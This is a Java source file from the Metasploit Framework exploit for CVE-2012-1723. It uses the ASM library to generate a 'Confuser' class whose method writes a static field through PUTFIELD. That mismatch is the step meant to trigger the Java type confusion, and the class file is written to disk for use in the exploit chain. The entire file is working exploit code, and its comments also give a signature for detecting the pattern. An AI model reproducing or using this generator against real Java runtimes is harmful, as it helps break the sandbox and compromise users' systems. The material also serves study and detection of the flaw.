GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2012-1723/src/cve1723/Generator.java
package cve1723;
import org.objectweb.asm.*;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.*;
import java.util.Arrays;
import static org.objectweb.asm.Opcodes.*;
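/**
 * CVE-2012-1723.
 *
 * <p>Generates, with ASM, the bytecode of a class {@code cve1723/Confuser} (class-file
 * version 1.5) whose {@code confuse} method issues a {@code PUTFIELD} against a field that
 * the same class declares {@code ACC_STATIC}. The pseudo-assembly comment inside
 * {@link #generateConfusion()} marks that static/instance mismatch as the step meant to
 * trigger the confusion this CVE describes. Only the bytes are produced; nothing in this
 * class defines or loads the generated class.
 *
 * <p>Detection note: a class file in which a {@code GETFIELD}/{@code PUTFIELD} operand names
 * a field that the same class declares static is a concrete, statically checkable signature
 * of this pattern; javac does not emit such code.
 */
public class Generator {

    /**
     * Builds the {@code cve1723/Confuser} class file in memory.
     *
     * <p>Layout of the emitted class:
     * <ul>
     *   <li>one {@code static} field {@code staticTypeA} of type {@code java.lang.ClassLoader};</li>
     *   <li>one hundred {@code public} instance fields {@code instanceTypeB0 .. instanceTypeB99}
     *       of type {@code cve1723/ConfusingClassLoader} (a type referenced, not generated, here;
     *       presumably defined elsewhere in these sources);</li>
     *   <li>a public no-arg constructor that only calls {@code Object.<init>};</li>
     *   <li>{@code public ConfusingClassLoader confuse(ClassLoader)}, whose body is sketched in
     *       the pseudo-assembly comment below.</li>
     * </ul>
     *
     * <p>{@code COMPUTE_FRAMES | COMPUTE_MAXS} makes ASM compute stack-map frames and max
     * stack/locals itself, so every {@code visitMaxs(0, 0)} below is a placeholder.
     *
     * @return the raw class-file bytes; this method writes nothing to disk
     */
    public static byte[] generateConfusion() {
        final String STATIC_FIELD_NAME = "staticTypeA";
        final String INSTANCE_FIELD_NAME = "instanceTypeB";
        final String CONFUSE_METHOD_NAME = "confuse";
        final String CONFUSER_CLASS_NAME = "cve1723/Confuser";

        // JVM descriptors of the two types the confusion is set up between.
        final String TYPE_A = "Ljava/lang/ClassLoader;";
        final String TYPE_B = "Lcve1723/ConfusingClassLoader;";

        final ClassWriter cw = new ClassWriter(ClassWriter.COMPUTE_FRAMES | ClassWriter.COMPUTE_MAXS);

        MethodVisitor mv = null;
        FieldVisitor fv = null;

        // Class-file version 1.5, public, extends java/lang/Object, no interfaces.
        cw.visit(V1_5, ACC_PUBLIC | ACC_SUPER, CONFUSER_CLASS_NAME, null, "java/lang/Object", null);

        // static field of type A (ClassLoader)
        {
            fv = cw.visitField(ACC_STATIC, STATIC_FIELD_NAME, TYPE_A, null, null);
            fv.visitEnd();
        }

        // one hundred fields of type B (ConfusingClassLoader): instanceTypeB0 .. instanceTypeB99
        {
            for (int i = 0; i < 100; i++) {
                fv = cw.visitField(ACC_PUBLIC, INSTANCE_FIELD_NAME + i, TYPE_B, null, null);
                fv.visitEnd();
            }
        }

        // constructor: plain Object.<init>() call, nothing else
        {
            mv = cw.visitMethod(ACC_PUBLIC, "<init>", "()V", null, null);
            mv.visitCode();
            mv.visitVarInsn(ALOAD, 0);
            // 4-argument overload: ASM 4-era API. ASM 5+ adds a trailing boolean
            // "isInterface" parameter and deprecates this form -- check the ASM version
            // on the classpath before upgrading.
            mv.visitMethodInsn(INVOKESPECIAL, "java/lang/Object", "<init>", "()V");
            mv.visitInsn(RETURN);
            mv.visitMaxs(0, 0); // recomputed by COMPUTE_MAXS
            mv.visitEnd();
        }

        // confuse method: (ClassLoader) -> ConfusingClassLoader
        {
            mv = cw.visitMethod(ACC_PUBLIC, CONFUSE_METHOD_NAME, "(" + TYPE_A + ")" + TYPE_B, null, null);
            mv.visitCode();
            /*
            Pseudo-assembly of the body emitted below:

            aload 1              // push parameter onto stack
            ifnonnull cont
            aconst_null
            areturn              // quick return on a null argument
            cont:
            getstatic staticTypeA
            pop
            aload 0
            aload 1
            putfield staticTypeA // force this into a non-static field access
                                 // (the field was declared ACC_STATIC above)

            // find instance field that's not null -- repeated for
            // instanceTypeB0 .. instanceTypeB99
            aload 0
            getfield instanceTypeB0
            ifnull cont0
            aload 0
            getfield instanceTypeB0
            areturn
            cont0:
            ...

            aconst_null
            areturn
            */

            // first part: null-check the single argument (local slot 1)
            mv.visitVarInsn(ALOAD, 1);
            final Label cont = new Label();
            mv.visitJumpInsn(IFNONNULL, cont);
            mv.visitInsn(ACONST_NULL);
            mv.visitInsn(ARETURN);
            mv.visitLabel(cont);

            // 2nd part: read the static field (result discarded), then write the
            // argument to the same field name via PUTFIELD, i.e. as an instance field.
            mv.visitFieldInsn(GETSTATIC, CONFUSER_CLASS_NAME, STATIC_FIELD_NAME, TYPE_A);
            mv.visitInsn(POP);
            mv.visitVarInsn(ALOAD, 0);
            mv.visitVarInsn(ALOAD, 1);
            mv.visitFieldInsn(PUTFIELD, CONFUSER_CLASS_NAME, STATIC_FIELD_NAME, TYPE_A);

            // 3rd part: return the first non-null instanceTypeB<i>, if any.
            for (int i = 0; i < 100; i++) {
                mv.visitVarInsn(ALOAD, 0);
                mv.visitFieldInsn(GETFIELD, CONFUSER_CLASS_NAME, INSTANCE_FIELD_NAME + i, TYPE_B);
                final Label contN = new Label();
                mv.visitJumpInsn(IFNULL, contN);
                mv.visitVarInsn(ALOAD, 0);
                mv.visitFieldInsn(GETFIELD, CONFUSER_CLASS_NAME, INSTANCE_FIELD_NAME + i, TYPE_B);
                mv.visitInsn(ARETURN);
                mv.visitLabel(contN);
            }

            // all instance fields were null
            mv.visitInsn(ACONST_NULL);
            mv.visitInsn(ARETURN);

            mv.visitMaxs(0, 0); // recomputed by COMPUTE_MAXS
            mv.visitEnd();
        }
        cw.visitEnd();

        return cw.toByteArray();
    }

    /**
     * Writes the generated class to {@code Confuser.class} in the current working directory.
     *
     * <p>The stream is closed in {@code finally} so a failed {@code write} does not leak the
     * file descriptor (the original closed it only on the success path).
     *
     * @param args ignored
     * @throws Exception if the file cannot be created or written
     */
    public static void main(final String args[]) throws Exception {
        final byte data[] = Generator.generateConfusion();
        final FileOutputStream fo = new FileOutputStream("Confuser.class");
        try {
            fo.write(data);
        } finally {
            fo.close();
        }
    }
}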